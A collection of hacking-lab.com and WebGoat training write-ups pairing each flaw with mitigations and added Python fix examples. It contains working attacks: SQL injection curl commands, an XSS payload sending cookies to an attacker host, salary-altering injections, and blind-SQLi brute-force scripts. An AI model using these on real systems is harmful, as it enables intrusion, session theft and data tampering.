http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/
```
-------------------------------------------------------------------------------- /hacking-lab.com/top10.md: --------------------------------------------------------------------------------

### A1 - SQL Injection Attack

```
### Vulnerability

SQLi in `password` field.
8 | 9 | ### Exploitation 10 | 11 | # Get ACookie: 12 | $ RET=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case2/inputval2/controller?action=showpage&page=start' -k | grep 'Set-Cookie' | awk '{print $2}' | tr ';' ' '` 13 | 14 | # Get credit card number: 15 | $ curl -s -b "$RET" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case2/auth_inputval2/login' -k --data 'username=hacker10&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case2%252Finputval2%252Fcontroller%253Faction%253Dprofile&send=Login' --data-urlencode "password=' or 'a'='a" | grep creditcard 16 | 17 | ### Mitigation 18 | 19 | Validate user input. 20 | ``` 21 | 22 | ### A2 - XSS 23 | 24 | ``` 25 | ### Vulnerability 26 | 27 | As mentioned in the task description, XSS vulnerability exists in the comments site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments). 28 | 29 | Vulnerability can be discovered using following steps: 30 | 31 | Step 0: Create authenitcated session for user 'hacker10' (get ACookie & BCookie cookies) - only authenitcated users can add comments: 32 | 33 | $ ACOOKIE=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showpage&page=start' -k | grep 'ACookie' | awk '{print $2}' | tr ';' ' '` 34 | 35 | $ BCOOKIE=`curl -i -s -b "$ACOOKIE" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case1/auth_inputval1/login' -k --data 'username=hacker10&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case1%252Finputval1%252Fcontroller%253Faction%253Dprofile&send=Login' | grep 'BCookie' | awk '{print $2}' | tr ';' ' '` 36 | 37 | Step 1: Add comment text that contains JavaScript code & verify that sent code is reflected in server's response: 38 | 39 | $ curl -s -b "$ACOOKIE;$BCOOKIE" -k 
'https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=addcomment&comment=%3cscript%3ealert%281%29%3b%3c%2fscript%3e' | grep '' 40 | 41 | Now, when comment site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments) will be visited via browser injected script will be executed. 42 | 43 | ### Exploitation 44 | 45 | To exploit this vulnerability following steps could be performed: 46 | 47 | First attacker needs to log in to add comments, to do so vulnerability discovered in A1 (sql injection in login form) could be used: 48 | 49 | [attacker] $ ACOOKIE=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showpage&page=start' -k | grep 'ACookie' | awk '{print $2}' | tr ';' ' '` 50 | 51 | [attacker] $ BCOOKIE=`curl -i -s -b "$ACOOKIE" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case1/auth_inputval1/login' -k --data 'username=hacker11&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case1%252Finputval1%252Fcontroller%253Faction%253Dprofile&send=Login' --data-urlencode "password=' or 'a'='a" | grep 'Set-Cookie' | awk '{print $2}' | tr ';' ' '` 52 | 53 | Attacker sets up landing page on machine 10.201.3.2 for cookies: 54 | 55 | [attacker] $ python -m SimpleHTTPServer 8888 56 | 57 | Then attacker adds malicious js script at comment site: 58 | 59 | [attacker] $ curl -s -b "$ACOOKIE;$BCOOKIE" -k 'https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=addcomment&comment=%3cscript%3elocation.href%3d%22http%3a%2f%2f10.201.3.2%3a8888%2f%22%2bdocument.cookie%3c%2fscript%3e' 60 | 61 | Then, when valid user will buy & pay for cow bells and he will visit comment site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments) his cookies will be transmitted to the attacker's web server. 
Snippet from attacker's server log: 62 | 63 | 10.201.3.2 - - [04/Jan/2016 00:11:57] "GET /ACookie=12345;%20BCookie=wWqw6YkDPdzbBOdMxLBbWg== HTTP/1.1" 404 - 64 | 65 | ### Mitigation 66 | 67 | Follow https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet to prevent XSS. 68 | 69 | Set HttpOnly flag (https://www.owasp.org/index.php/HttpOnly) for cookies. 70 | ``` 71 | 72 | ### A3 - Broken Authentication and Session 73 | 74 | ``` 75 | ### Vulnerability 76 | 77 | Authentication and session management is flawed. The same AValue is used for a user as a session id before and after user has authenticated. 78 | 79 | Also storing session id in url also should be treated as a weakness because it makes mounting session fixation attacks easier. 80 | 81 | ### Exploitation 82 | 83 | Attack scenario: 84 | 85 | [1] Attacker gets session id (AValue) from vulnerable website: 86 | 87 | $ curl -s -i -k 'https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=showpage&page=navigate' | grep Location | awk '{print $2}' | awk -F "&" '{print $3}' 88 | 89 | AValue=9QKkSlzW75JS0RWvlaBgOg== 90 | 91 | [2] Via social engineering (or other mean) an attacker entices victim to authenticate via provided link (with earlier fetched session identifier): 92 | 93 | https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=profile&AValue=9QKkSlzW75JS0RWvlaBgOg== 94 | 95 | [3] After victim has logged in an attacker is able to see (and/or modify) victim's data simply by visiting this link: 96 | 97 | https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=profile&AValue=9QKkSlzW75JS0RWvlaBgOg== 98 | 99 | ### Mitigation 100 | 101 | Invalidate session ID (AValue) and generate new one after user has authenticated. 102 | 103 | Store session identifier in cookie rather than as part as url this makes mounting session fixation attacks more difficult. 

Additionally, when designing and/or implementing custom authentication and session management mechanisms, be sure to consult the following OWASP materials:

- ASVS
- https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management
- https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
- https://www.owasp.org/index.php/Session_Fixation
```

### A4 - Insecure Direct Object References

```
### Vulnerability

Observation:

After logging in as hacker10 with the following request:

GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker10&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login

BCookie is set and a redirect to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=1 is done, which returns hacker11's profile.

whereas after logging in as hacker11 using this request:

GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker11&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login

BCookie is set and a redirect to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=2 is done, which returns hacker11's profile.

Experiment:

GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker11&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login

GET https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=3

will return the profile of hacker12.

This experiment demonstrates that the authorization scheme is broken: the backend logic verifies only whether the user is logged in (valid ACookie & BCookie are sent) and then responds with profile data based solely on user input (the pid parameter).

### Exploitation

[1] Log in as user hacker10 (or hacker11)

[2] Use ACookie & BCookie from [1] and navigate to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=3 - hacker12's profile will be returned

### Mitigation

Fix the authorization scheme - do not return profile data based on the pid parameter but based on the session identifiers (ACookie & BCookie). For example, for a valid session identifier of user hacker10, allow viewing profile data only for this user.
```

### A5 - CSRF

```

### Vulnerability

Observation:

To buy a product the following two requests are needed:

GET http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller?action=addproduct&productId=1&quantity=1&Submit=Order

GET http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller?action=executeOrder

There is no anti-CSRF mechanism in place, so it is possible to mount a CSRF attack on an authenticated user of the Glockenemil Website (cookie0) site.

### Exploitation

[1] Attacker prepares the following "landing page":







Saves it as a b.html file and then hosts it on his machine (10.201.1.66):

$ python -m SimpleHTTPServer 8080

[2] Attacker entices a legitimate authenticated user (via social engineering, phishing, drive-by infection, etc.) to visit the attacker's "landing page": http://10.201.1.66:8080/b.html. This results in the legitimate user buying additional (unwanted) products.

### Mitigation

An anti-CSRF mechanism, for example the synchronizer token pattern, should be used (https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project).
```

### A6 - Security Misconfiguration

### A7 - Insecure Cryptographic Storage

### A8 - Failure to Restrict URL Access

```

### Vulnerability

### Exploitation

[1] Log in as hacker10 (passwd: compass)

[2] Navigate to: https://glocken.hacking-lab.com/12001/xpath_case0/admin/showtransactions

Here's the list of transactions:

Your query matched the following results:
result:
transaction:
id: 1
cardnr: 1323-4545-6767-8989
amount: 1000.0
transaction:
id: 2
cardnr: 1323-4545-6767-8989
amount: 1900.0
transaction:
id: 6
cardnr: 2322-4545-6457-8989
amount: 3600.0
transaction:
id: 9
cardnr: 2322-4545-6755-8989
amount: 400.0
transaction:
id: 5
cardnr: 2322-4545-6767-8945
amount: 800.0
transaction:
id: 4
cardnr: 2322-4545-6767-8989
amount: 4800.0
transaction:
id: 8
cardnr: 2322-4545-6767-8989
amount: 1200.0
transaction:
id: 10
cardnr: 2322-4545-6767-8989
amount: 4540.0
transaction:
id: 3
cardnr: 2323-4545-6767-8989
amount: 100.0
transaction:
id: 7
cardnr: 2345-4555-6767-8989
amount: 2540.0
transaction:
id: 11
cardnr: 2452-4545-6767-8989
amount: 370.0

### Mitigation

Enforce proper access control on the admin panel.
```

### A9 - Insufficient Transport Layer Protection

```
### Vulnerability

Presence of mixed HTTPS and HTTP content on the same page, which can be used to leak information.

For example, format.css is retrieved using the HTTP protocol:

GET http://glocken.hacking-lab.com/12001/cookie_case2/cookie2/format.css

so it transmits BCookie in clear text.

### Exploitation

A passive attacker could sniff for secrets (like BCookie) in traffic to the http://glocken.hacking-lab.com/12001/cookie_case2/cookie2 website.

An active attacker could mount MitM attacks.

### Mitigation

Do not mix HTTPS and HTTP content on the same page. Use properly configured TLS for all your resources. The HSTS mechanism (https://www.owasp.org/index.php/HTTP_Strict_Transport_Security) can be used to enforce this.
```

### A10 - Unvalidated Redirects and Forwards

--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/README.md:
--------------------------------------------------------------------------------
## Webgoat (from hacking-lab.com)

All levels (1 - 18).
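Looking back at the A4 (Insecure Direct Object References) section above: the following is an added example, not code from the write-up or from the Glockenemil application, that models the observed profile lookup in Python and places the mitigation next to it. The profile store, the pid values and the single session cookie standing in for the ACookie/BCookie pair are assumptions.

```python
import hmac
import secrets

# Constructed profile store: pid -> profile. An assumption standing in for the
# Glockenemil backend, which the write-up never shows.
PROFILES = {
    1: {"username": "hacker10"},
    2: {"username": "hacker11"},
    3: {"username": "hacker12"},
}

# Server-side session store: cookie value -> pid of the user who logged in.
# One opaque cookie stands in for the ACookie/BCookie pair of the write-up.
SESSIONS = {}


def login(username):
    """Issue an unguessable session cookie bound to the user's own pid."""
    pid = next(p for p, prof in PROFILES.items() if prof["username"] == username)
    cookie = secrets.token_urlsafe(32)
    SESSIONS[cookie] = pid
    return cookie


def _session_pid(cookie):
    """pid bound to a valid cookie, else None (constant-time value compare)."""
    for stored, pid in SESSIONS.items():
        if hmac.compare_digest(stored.encode(), cookie.encode()):
            return pid
    return None


def profile_vulnerable(cookie, pid):
    """Observed behaviour: authentication is checked, authorization is not,
    so any logged-in session may read any pid it names."""
    if _session_pid(cookie) is None:
        return None
    return PROFILES.get(pid)


def profile_fixed(cookie, pid):
    """Mitigation from the write-up: the session, not the request, decides
    whose profile comes back. A pid that is not the caller's own is refused
    (an HTTP handler would answer 403 or 404 here)."""
    owner = _session_pid(cookie)
    if owner is None or owner != pid:
        return None
    return PROFILES[owner]


def demo():
    """Re-run the write-up's experiment: log in as hacker11, request pid=3."""
    cookie = login("hacker11")
    leaked = profile_vulnerable(cookie, 3)
    blocked = profile_fixed(cookie, 3)
    return (leaked["username"] if leaked else None,
            blocked["username"] if blocked else None)


if __name__ == "__main__":
    print(demo())  # ('hacker12', None)
```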
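For the A5 (CSRF) section above, an added example of the synchronizer token pattern the mitigation names; it is not the write-up's code nor the Glockenemil controller, whose internals are not shown. The two actions (addproduct, executeOrder) and the controller URL come from the write-up; the session store, the csrf_token field name and the POST-only rule are assumptions of this model.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Server-side session store: session cookie -> per-session CSRF token.
SESSIONS = {}

# Actions that change state and therefore need a token. In the write-up both
# are plain GETs, which is part of the problem: an <img> or <iframe> on the
# attacker's page can issue them. State changes should be POST-only.
STATE_CHANGING = {"addproduct", "executeOrder"}

BASE = "http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller"


def start_session():
    """Return (session cookie, CSRF token). The token is embedded in the site's
    own forms and, unlike the cookie, is never sent automatically by the browser
    and cannot be read cross-origin."""
    cookie = secrets.token_urlsafe(32)
    token = secrets.token_urlsafe(32)
    SESSIONS[cookie] = token
    return cookie, token


def _action(url):
    return parse_qs(urlsplit(url).query).get("action", [""])[0]


def handle_vulnerable(cookie, method, url, body=""):
    """Observed behaviour: a valid session cookie is all it takes."""
    if cookie not in SESSIONS:
        return "401 not logged in"
    return "200 %s done" % _action(url)


def handle_fixed(cookie, method, url, body=""):
    """Mitigation: state-changing actions require POST plus a token matching
    the one stored for the session. A forged request from another origin
    carries the cookie (browser adds it) but cannot carry the token."""
    if cookie not in SESSIONS:
        return "401 not logged in"
    action = _action(url)
    if action in STATE_CHANGING:
        if method != "POST":
            return "405 state changes must be POSTed"
        sent = parse_qs(body).get("csrf_token", [""])[0]
        if not hmac.compare_digest(sent.encode(), SESSIONS[cookie].encode()):
            return "403 csrf token missing or wrong"
    return "200 %s done" % action


def demo():
    """The write-up's attack (a GET from b.html) against both handlers, plus a
    legitimate submission from the site's own form."""
    cookie, token = start_session()
    forged = BASE + "?action=executeOrder"
    return {
        "vuln_forged": handle_vulnerable(cookie, "GET", forged),
        "fixed_forged_get": handle_fixed(cookie, "GET", forged),
        "fixed_forged_post": handle_fixed(cookie, "POST", forged, "csrf_token=guess"),
        "fixed_legit": handle_fixed(cookie, "POST", forged, "csrf_token=" + token),
        "fixed_read_only": handle_fixed(cookie, "GET", BASE + "?action=profile"),
    }
```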
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge1.md:
--------------------------------------------------------------------------------

## Analysis of the given RBAC system:

### Roles:
```
[Public]
[User]
[Manager]
[Admin]
```

### Users of the system:
```
Moe
Larry
Curly
Shemp
```

### Resources:
```
Public Share (ps)
Time Card Entry (tce)
Performance Review (pr)
Time Card Approval (tca)
Site Manager (sm)
Account Manager (am)
```

### Role assignment looks like this:
```
Moe is assigned to: [Public]
Larry is assigned to role: [User], [Manager]
Curly is assigned to role: [Public], [Manager]
Shemp is assigned to role: [Admin]
```

### After reviewing allowed access for each user, we can build the following role permissions matrix:

```
Public role has access to: ps
User role has access to: tce, am
Manager role has access to: pr, tca
Admin role has access to: sm, am
```

## Vulnerability:

The system policy states that:
Only the [Admin] group should have access to the 'Account Manager' resource.

There is an issue with the [User] role. Larry, who is assigned to this role, is allowed to access the restricted resource 'Account Manager', which is against the system policy.

## Exploitation:
If a user is assigned to the [User] role, he will be able to access the restricted 'Account Manager' resource.

## Mitigation:
The [User] role shouldn't give access to 'Account Manager'. The role permissions matrix should be fixed.
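The RBAC review above done mechanically, as an added example (not part of the write-up): the roles, users, resources and permissions matrix are the ones listed in the analysis, the policy rule is the one quoted in the Vulnerability section, and the audit and repair functions are mine.

```python
# Role -> resources, as read off the application (the write-up's matrix).
ROLE_PERMISSIONS = {
    "Public":  {"ps"},
    "User":    {"tce", "am"},
    "Manager": {"pr", "tca"},
    "Admin":   {"sm", "am"},
}

# User -> assigned roles (the write-up's role assignment).
ASSIGNMENTS = {
    "Moe":   {"Public"},
    "Larry": {"User", "Manager"},
    "Curly": {"Public", "Manager"},
    "Shemp": {"Admin"},
}

# Policy: resource -> the only roles allowed to reach it. The challenge text
# constrains only 'Account Manager' (am); every other resource is unconstrained.
POLICY = {"am": {"Admin"}}


def effective_access(assignments=ASSIGNMENTS, perms=ROLE_PERMISSIONS):
    """User -> set of resources reachable through any of the user's roles."""
    return {user: set().union(*(perms[r] for r in roles))
            for user, roles in assignments.items()}


def policy_violations(assignments=ASSIGNMENTS, perms=ROLE_PERMISSIONS, policy=POLICY):
    """(user, resource, via_role) triples where a user reaches a constrained
    resource through a role the policy does not list for it. Sorted so the
    result is stable regardless of set iteration order."""
    found = []
    for user, roles in sorted(assignments.items()):
        for role in sorted(roles):
            for res in sorted(perms[role]):
                allowed = policy.get(res)
                if allowed is not None and role not in allowed:
                    found.append((user, res, role))
    return found


def fixed_permissions(perms=ROLE_PERMISSIONS, policy=POLICY):
    """Mitigation: drop every constrained resource from the roles that the
    policy does not allow to hold it (here: 'am' leaves the User role)."""
    return {role: {r for r in res if role in policy.get(r, {role})}
            for role, res in perms.items()}


if __name__ == "__main__":
    print(policy_violations())                      # [('Larry', 'am', 'User')]
    print(policy_violations(perms=fixed_permissions()))  # []
```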
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge10.md:
--------------------------------------------------------------------------------
## Vulnerability:

Logging in as the webgoat user without providing a password is possible. It was observed that not sending the 'Password' field in the request body allows logging in.

Expected request body:
```
Username=&Password=&SUBMIT=Login
```

Sent request body:
```
Username=webgoat&SUBMIT=Login
```

It seems that the backend logic checks the password only if it is explicitly provided in the input form.

## Exploitation:

I used Zed Attack Proxy to exploit this vulnerability. Sending the following request grants access to the webgoat account.

```
POST http://webgoat.hacking-lab.com/attack?Screen=39&menu=1000 HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webgoat.hacking-lab.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/39.0.2171.65 Chrome/39.0.2171.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://webgoat.hacking-lab.com/attack?Screen=39&menu=1000
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=7EF7C71D975B0B9E4C63DF97F5ED7112
Host: webgoat.hacking-lab.com

Username=webgoat&SUBMIT=Login
```

## Mitigation:

Fix the backend logic to always check for the password. If the password isn't present in the request form, do not grant access.
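The missing-field logic described above, as an added example that is not the write-up's code nor WebGoat's: the two request bodies are the ones quoted in the write-up, while the credential store and the password 'webgoat' used for the demo are assumptions, and the vulnerable handler is a reconstruction of the observed behaviour.

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed credential store: username -> (salt, pbkdf2 hash).
# The password value is an assumption for the demo, not a challenge value.
_SALT = os.urandom(16)
USERS = {"webgoat": (_SALT, _hash("webgoat", _SALT))}


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body. Blank values are kept,
    so 'Password=' (present, empty) and no Password field at all stay distinct."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def login_vulnerable(body):
    """Reconstruction of the observed logic: the password is verified only when
    the field is present, so omitting it skips the check altogether."""
    form = parse_body(body)
    user = form.get("Username")
    if user not in USERS:
        return False
    if "Password" in form:
        salt, stored = USERS[user]
        return hmac.compare_digest(_hash(form["Password"], salt), stored)
    return True   # the defect: an absent field is treated as 'nothing to verify'


def login_fixed(body):
    """Mitigation: a missing or empty password is a failed login, always."""
    form = parse_body(body)
    user = form.get("Username")
    password = form.get("Password")
    if user not in USERS or not password:
        return False
    salt, stored = USERS[user]
    return hmac.compare_digest(_hash(password, salt), stored)


# The two bodies from the write-up.
SENT_BODY = "Username=webgoat&SUBMIT=Login"              # Password field omitted
EXPECTED_BODY = "Username=webgoat&Password=&SUBMIT=Login"  # present but blank

if __name__ == "__main__":
    print(login_vulnerable(SENT_BODY), login_fixed(SENT_BODY))  # True False
```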
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge11.md:
--------------------------------------------------------------------------------
## Vulnerability:

This is a classical SQL injection vulnerability where user-supplied input from a form is used to build an SQL query.

## Exploitation:

By submitting the following input:
```
Smith' OR 1=1 --
```

we can retrieve all DB records.

## Mitigation:
1) validate input data
2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet)
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge12.md:
--------------------------------------------------------------------------------

## Vulnerability:

This time an integer value is supplied to the SQL query via a drop-down menu.

## Exploitation:

Modified request in ZAP that exploits this vulnerability:

```
POST http://webgoat.hacking-lab.com/attack?Screen=77&menu=1100 HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webgoat.hacking-lab.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/39.0.2171.65 Chrome/39.0.2171.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://webgoat.hacking-lab.com/attack?Screen=77&menu=1100
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DD06788BDCB1B5813FA6CDC51452FF6E
Cookie: $Version=0; JSESSIONID=A93334E44AE5E96915FD28AA47049A61; $Path=/
Host: webgoat.hacking-lab.com
Cookie: $Version=0; JSESSIONID=A93334E44AE5E96915FD28AA47049A61; $Path=/

station=102+OR+1%3D1&SUBMIT=Go%21
```

It retrieves all DB records.

## Mitigation:
1) validate input data

2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet)
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge13.md:
--------------------------------------------------------------------------------
## Vulnerability:

SQL injection

## Exploitation:

The following input modifies the salary for user jsmith:
```
jsmith'; UPDATE salaries SET salary=2 WHERE userid='jsmith
```

## Mitigation:
1) validate input data

2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet)
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge14.md:
--------------------------------------------------------------------------------
## Vulnerability:

SQL injection

## Exploitation:

The following input adds a record to the salaries table:
```
jsmith'; INSERT INTO salaries (userid, salary) VALUES ('mzet', 999999) --
```

## Mitigation:
1) validate input data

2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet)
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge15.md:
--------------------------------------------------------------------------------
## Vulnerability:

The site is vulnerable to reflected XSS.

## Exploitation:

Injecting the following JavaScript code:
```

```

changes the log to:
```
"Login succeeded for username: admin"
```

## Mitigation:
1) Validate input data.

2) Use https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet as a guideline to defend against XSS attacks.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge16.md:
--------------------------------------------------------------------------------
## Vulnerability:

blind SQLi

## Exploitation:

Here's my script that exploits this issue (it finds the requested pin field: 2364 in the pins table):

```
#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
from requests import post

# route the traffic through a local intercepting proxy (ZAP) for inspection
proxies = {
    "http": "http://127.0.0.1:8081",
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://webgoat.hacking-lab.com',
    'Referer': 'http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100'
}

cookie = ''

# try every 4-digit pin; the page answers differently when the subselect matches
for i in range(1111, 10000):
    print(i)
    payload = "101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444)="+str(i)
    data = {'account_number': payload, 'SUBMIT': 'Go'}
    if cookie == '':
        # first request: let the server issue a session and keep its JSESSIONID
        r = post("http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100", headers=headers, proxies=proxies, data=data)
        cookie = dict(JSESSIONID=r.cookies['JSESSIONID'])
    else:
        r = post("http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100", headers=headers, proxies=proxies, cookies=cookie, data=data)

    if 'Account number is valid' in r.text:
        print('pin: ' + str(i))
        break
```

## Mitigation:
1) validate input data

2) follow guidelines from https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge17.md:
--------------------------------------------------------------------------------
## Vulnerability:

blind SQLi

## Exploitation:

Here's my script that exploits this issue (it finds the requested name field: "Jill" in the pins table):

```
#!/usr/bin/python3

# (http://docs.python-requests.org/en/latest/)
from requests import post

# route the traffic through a local intercepting proxy (ZAP) for inspection
proxies = {
    "http": "http://127.0.0.1:8081",
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://webgoat.hacking-lab.com',
    'Referer': 'http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100'
}

cookie = ''

for j in range(1, 10):          # character positions 1..9 of the name
    for i in range(65, 123):    # candidate ASCII codes 'A'..'z'
        # substr(name, j, 1) is the j-th character; the original used substr(name, j, j),
        # which only worked because ascii() looks at the first character of its argument
        payload = "101 AND (SELECT ascii(substr(name,"+str(j)+",1)) FROM pins WHERE cc_number=4321432143214321)="+str(i)

        data = {'account_number': payload, 'SUBMIT': 'Go'}
        if cookie == '':
            # first request: let the server issue a session and keep its JSESSIONID
            r = post("http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100", headers=headers, proxies=proxies, data=data)
            cookie = dict(JSESSIONID=r.cookies['JSESSIONID'])
        else:
            r = post("http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100", headers=headers, proxies=proxies, cookies=cookie, data=data)

        if 'Account number is valid' in r.text:
            print(chr(i))
            break
```

## Mitigation:
1) validate input data

2) follow guidelines from https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge18.md:
--------------------------------------------------------------------------------
## Vulnerability:

While observing AuthCookie for users:

```
webgoat: 65432ubphcfx
aspect: 65432udfqtb
```

we can easily see that AuthCookie is generated from the username using the following formula:

1) 65432 is a fixed prefix

2) the second part is a Caesar cipher with a right shift of 1 ('a' becomes 'b', 'c' becomes 'd' and so on) applied to the username read from the end to the beginning

So for username alice, AuthCookie is equal to: `65432fdjmb`

## Exploitation:

I used ZAP to intercept the request & change the AuthCookie cookie to 65432fdjmb, and I was recognized as alice by the backend.

## Mitigation:

It shouldn't be possible to calculate the AuthCookie for user B knowing the AuthCookie cookie for user A. Randomness should be incorporated in generating AuthCookie.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge2.md:
--------------------------------------------------------------------------------
## Vulnerability:

The access control mechanism is only implemented for the `/var/lib/tomcat6/webapps/ROOT/lesson_plans/English` directory. It allows access to files from the list and denies access to all other files (from that directory).

However (as shown in the 'Exploitation' paragraph below) there is no real access control for the parent directory (`lesson_plans/`), so a user can access files from that directory.

## Exploitation:

I used the "Live HTTP headers" add-on for Firefox to solve this level.

Here's my HTTP request that gave me access to the /var/lib/tomcat6/webapps/ROOT/lesson_plans/secret.txt file:

```
Host: webgoat.hacking-lab.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://webgoat.hacking-lab.com/attack?Screen=57&menu=200
Cookie: JSESSIONID=03720BE9C23566001E524C889638B7EE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

File=../secret.txt&SUBMIT=View+File
```

## Mitigation:

A proper access control mechanism should be implemented for the whole directory hierarchy in the webserver's root directory (`webapps/ROOT`).

It is also recommended that all sensitive files (like 'secret.txt') be kept outside the webserver's root directory (`webapps/ROOT`) or be explicitly denied by the access control mechanism.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge3.md:
--------------------------------------------------------------------------------
## Vulnerability:

The following line has been found in the site's source:
```

```

## Exploitation:
Use the found credentials to log in - you have gained administrator privileges.

## Mitigation:
1) Do not leave credentials (and any other sensitive information) in source code.

2) use stronger passwords :) - this one could also be easily brute-forced.
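The mitigation repeated in challenges 11-14, 16 and 17 (prepared statements instead of string-built SQL), as one added example that is not the write-ups' code nor WebGoat's: the inputs are the challenge 11 and challenge 13 payloads quoted above, the table and column names salaries/userid/salary follow the write-ups, and the rows, the employees table and the use of SQLite in place of WebGoat's database are constructed assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory database (not WebGoat's schema beyond the names)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE employees (last_name TEXT, first_name TEXT);
        INSERT INTO employees VALUES ('Smith', 'John'), ('Doe', 'Jane'), ('Lee', 'Ann');
        CREATE TABLE salaries (userid TEXT, salary INTEGER);
        INSERT INTO salaries VALUES ('jsmith', 50000), ('jdoe', 62000);
    """)
    return con


def search_concat(con, last_name):
    """Vulnerable (challenge 11 pattern): the input is pasted into the SQL text,
    so a quote ends the literal and the rest is parsed as SQL."""
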